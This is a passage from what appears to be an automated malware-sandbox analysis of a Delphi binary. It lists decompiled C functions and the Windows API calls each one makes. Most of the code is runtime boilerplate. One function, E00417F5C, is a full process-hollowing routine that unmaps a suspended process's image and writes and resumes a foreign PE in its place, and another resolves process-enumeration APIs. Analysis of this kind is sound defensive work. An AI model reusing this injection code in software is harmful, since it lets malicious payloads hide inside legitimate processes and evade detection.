      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
    				void* _t3;
    				void* _t6;
    
    				if(__eax <= 0) {
    					_t6 = 0;
    				} else {
    					_t3 =  *0x41903c(); // executed
    					_t6 = _t3;
    					if(_t6 == 0) {
    						E00402778(1);
    					}
    				}
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
    				void* _t6;
    				intOrPtr _t7;
    
    				_t7 = __edx;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454638 = __eax;
    				 *0x45463c = 0;
    				 *0x454640 = __edx;
    				_t1 = _t7 + 4; // 0x400000
    				 *0x45402c =  *_t1;
    				E00403A70();
    				 *0x454034 = 0; // executed
    				_t6 = E00403B18(); // executed
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
    				intOrPtr _v8;
    				char _v12;
    				CONTEXT* _v16;
    				void* _v20;
    				void _v24;
    				void _v28;
    				long _v32;
    				struct _PROCESS_INFORMATION _v48;
    				struct _STARTUPINFOA _v116;
    				CHAR* _t95;
    				short* _t171;
    				intOrPtr _t182;
    				intOrPtr _t189;
    				intOrPtr* _t194;
    				short* _t196;
    				void* _t197;
    				void* _t199;
    				void* _t200;
    				intOrPtr _t201;
    				void* _t215;
    
    				_t215 = __fp0;
    				_t199 = _t200;
    				_t201 = _t200 + 0xffffff90;
    				_t196 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t199);
    				_push(0x418218);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t201;
    				if(_v12 != 0) {
    					_push(0x418230);
    					_push(_v8);
    					_push(0x41823c);
    					_push(_v12);
    					E00404208();
    				}
    				 *_a4 = 0;
    				_t171 = _t196;
    				if( *_t171 == 0x5a4d) {
    					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
    					if( *_t194 == 0x4550) {
    						E00402B60( &_v116, 0x44);
    						E00402B60( &_v48, 0x10);
    						_v116.cb = 0x44;
    						_v116.dwFlags = 1;
    						_v116.wShowWindow = 0;
    						_t95 = E00404348(_v12);
    						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
    							 *_a4 = _v48.dwProcessId;
    							_v16 = E00417F28( &_v20);
    							if(_v16 != 0) {
    								_v16->ContextFlags = 0x10007;
    								if(GetThreadContext(_v48.hThread, _v16) != 0) {
    									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
    									if( *(_t194 + 0x34) != _v24) {
    										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    									} else {
    										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
    											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
    										} else {
    											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    										}
    									}
    									_t210 = _v28;
    									if(_v28 != 0) {
    										_t197 = E00417EA4(_t196, _t210);
    										_t125 = _v28;
    										if( *(_t194 + 0x34) != _v28) {
    											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
    											 *(_t194 + 0x34) = _v28;
    											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
    										}
    										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
    										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
    										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
    										SetThreadContext(_v48.hThread, _v16);
    										ResumeThread(_v48.hThread);
    										WaitForSingleObject(_v48.hThread, 0xffffffff);
    										_push(_t199);
    										_push(0x4181d0);
    										_push( *[fs:eax]);
    										 *[fs:eax] = _t201;
    										TerminateThread(_v48.hProcess, 0);
    										CloseHandle(_v48.hProcess);
    										_pop(_t189);
    										 *[fs:eax] = _t189;
    									}
    								}
    								VirtualFree(_v20, 0, 0x8000);
    							}
    							if( *_a4 == 0) {
    								TerminateProcess(_v48, 0);
    							}
    						}
    					}
    				}
    				_pop(_t182);
    				 *[fs:eax] = _t182;
    				_push(E0041821F);
    				return E00403EAC( &_v12, 2);
    			}
























    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
    				char* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				struct _WIN32_FIND_DATAA _v334;
    				char _v595;
    				void* _t45;
    				char* _t54;
    				char* _t64;
    				void* _t83;
    				intOrPtr* _t84;
    				char* _t90;
    				struct HINSTANCE__* _t91;
    				char* _t93;
    				void* _t94;
    				char* _t95;
    				void* _t96;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = _v8;
    				_t91 = GetModuleHandleA("kernel32.dll");
    				if(_t91 == 0) {
    					L4:
    					if( *_v8 != 0x5c) {
    						_t93 = _v8 + 2;
    						goto L10;
    					} else {
    						if( *((char*)(_v8 + 1)) == 0x5c) {
    							_t95 = E00404DF4(_v8 + 2);
    							if( *_t95 != 0) {
    								_t14 = _t95 + 1; // 0x1
    								_t93 = E00404DF4(_t14);
    								if( *_t93 != 0) {
    									L10:
    									_t83 = _t93 - _v8;
    									_push(_t83 + 1);
    									_push(_v8);
    									_push( &_v595);
    									L00401248();
    									while( *_t93 != 0) {
    										_t90 = E00404DF4(_t93 + 1);
    										_t45 = _t90 - _t93;
    										if(_t45 + _t83 + 1 <= 0x105) {
    											_push(_t45 + 1);
    											_push(_t93);
    											_push( &(( &_v595)[_t83]));
    											L00401248();
    											_t94 = FindFirstFileA( &_v595,  &_v334);
    											if(_t94 != 0xffffffff) {
    												FindClose(_t94);
    												_t54 =  &(_v334.cFileName);
    												_push(_t54);
    												L00401250();
    												if(_t54 + _t83 + 1 + 1 <= 0x105) {
    													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
    													_push(0x105 - _t83 - 1);
    													_push( &(_v334.cFileName));
    													_push( &(( &(( &_v595)[_t83]))[1]));
    													L00401248();
    													_t64 =  &(_v334.cFileName);
    													_push(_t64);
    													L00401250();
    													_t83 = _t83 + _t64 + 1;
    													_t93 = _t90;
    													continue;
    												}
    											}
    										}
    										goto L17;
    									}
    									_push(_v12);
    									_push( &_v595);
    									_push(_v8);
    									L00401248();
    								}
    							}
    						}
    					}
    				} else {
    					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
    					if(_t84 == 0) {
    						goto L4;
    					} else {
    						_push(0x105);
    						_push( &_v595);
    						_push(_v8);
    						if( *_t84() == 0) {
    							goto L4;
    						} else {
    							_push(_v12);
    							_push( &_v595);
    							_push(_v8);
    							L00401248();
    						}
    					}
    				}
    				L17:
    				return _v16;
    			}




















    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
    				char _v11;
    				char _v16;
    				intOrPtr _t28;
    				void* _t31;
    				void* _t33;
    
    				_t33 = __eflags;
    				_v16 = 0;
    				_push(_t31);
    				_push(0x40b318);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t31 + 0xfffffff4;
    				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
    				E004040F8( &_v16, 7,  &_v11);
    				_push(_v16);
    				E00407174(7, GetACP(), _t33);
    				_pop(_t28);
    				 *[fs:eax] = _t28;
    				_push(E0040B31F);
    				return E00403E88( &_v16);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
    				char _v8;
    				char _v15;
    				char _v20;
    				intOrPtr _t29;
    				void* _t32;
    
    				_v20 = 0;
    				_push(_t32);
    				_push(0x4058e2);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t32 + 0xfffffff0;
    				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
    				E004040F8( &_v20, 7,  &_v15);
    				E00402B80(_v20,  &_v8);
    				if(_v8 != 0) {
    				}
    				_pop(_t29);
    				 *[fs:eax] = _t29;
    				_push(E004058E9);
    				return E00403E88( &_v20);
    			}









    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
    				char _v260;
    				intOrPtr _t10;
    				void* _t18;
    
    				_t18 = __ecx;
    				_t10 = _a4;
    				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
    					return E00403EDC(_t10, _t18);
    				}
    				return E00403F78(_t10, _t5 - 1,  &_v260);
    			}







    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
    				char _v16;
    				char _t5;
    				char _t6;
    
    				_push(__ecx);
    				_t6 = __ecx;
    				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
    					_t5 = _t6;
    				} else {
    					_t5 = _v16;
    				}
    				return _t5;
    			}







    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00417A70() {
    
    				if( *0x454a18 == 0) {
    					 *0x454a18 = GetModuleHandleA("kernel32.dll");
    					if( *0x454a18 != 0) {
    						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
    						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
    						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
    						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
    						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
    						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
    						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
    						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
    						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
    						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
    						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
    						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
    						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
    						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
    						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
    						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
    					}
    				}
    				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
    					return 0;
    				} else {
    					return 1;
    				}
    			}




    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040CA40() {
    				struct HINSTANCE__* _v8;
    				intOrPtr _t46;
    				void* _t91;
    
    				_v8 = GetModuleHandleA("oleaut32.dll");
    				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
    				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
    				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
    				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
    				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
    				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
    				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
    				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
    				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
    				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
    				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
    				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
    				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
    				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
    				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
    				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
    				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
    				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
    				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
    				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
    				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
    				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
    				 *0x4547f4 = _t46;
    				return _t46;
    			}







    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
    				char _t5;
    				char _t6;
    				CHAR* _t7;
    				char _t9;
    				CHAR* _t11;
    				char _t14;
    				CHAR* _t15;
    				char _t17;
    				CHAR* _t19;
    				CHAR* _t22;
    				CHAR* _t23;
    				CHAR* _t32;
    				intOrPtr _t33;
    				intOrPtr* _t34;
    				void* _t35;
    				void* _t36;
    
    				_t34 = __edx;
    				_t22 = __eax;
    				while(1) {
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L4:
    					if( *_t22 != 0x22 || _t22[1] != 0x22) {
    						_t36 = 0;
    						_t32 = _t22;
    						while(1) {
    							_t6 =  *_t22;
    							if(_t6 <= 0x20) {
    								break;
    							}
    							if(_t6 != 0x22) {
    								_t7 = CharNextA(_t22);
    								_t36 = _t36 + _t7 - _t22;
    								_t22 = _t7;
    								continue;
    							}
    							_t22 = CharNextA(_t22);
    							while(1) {
    								_t9 =  *_t22;
    								if(_t9 == 0 || _t9 == 0x22) {
    									break;
    								}
    								_t11 = CharNextA(_t22);
    								_t36 = _t36 + _t11 - _t22;
    								_t22 = _t11;
    							}
    							if( *_t22 != 0) {
    								_t22 = CharNextA(_t22);
    							}
    						}
    						E00404478(_t34, _t36);
    						_t23 = _t32;
    						_t33 =  *_t34;
    						_t35 = 0;
    						while(1) {
    							_t14 =  *_t23;
    							if(_t14 <= 0x20) {
    								break;
    							}
    							if(_t14 != 0x22) {
    								_t15 = CharNextA(_t23);
    								if(_t15 <= _t23) {
    									continue;
    								} else {
    									goto L27;
    								}
    								do {
    									L27:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t15 > _t23);
    								continue;
    							}
    							_t23 = CharNextA(_t23);
    							while(1) {
    								_t17 =  *_t23;
    								if(_t17 == 0 || _t17 == 0x22) {
    									break;
    								}
    								_t19 = CharNextA(_t23);
    								if(_t19 <= _t23) {
    									continue;
    								} else {
    									goto L21;
    								}
    								do {
    									L21:
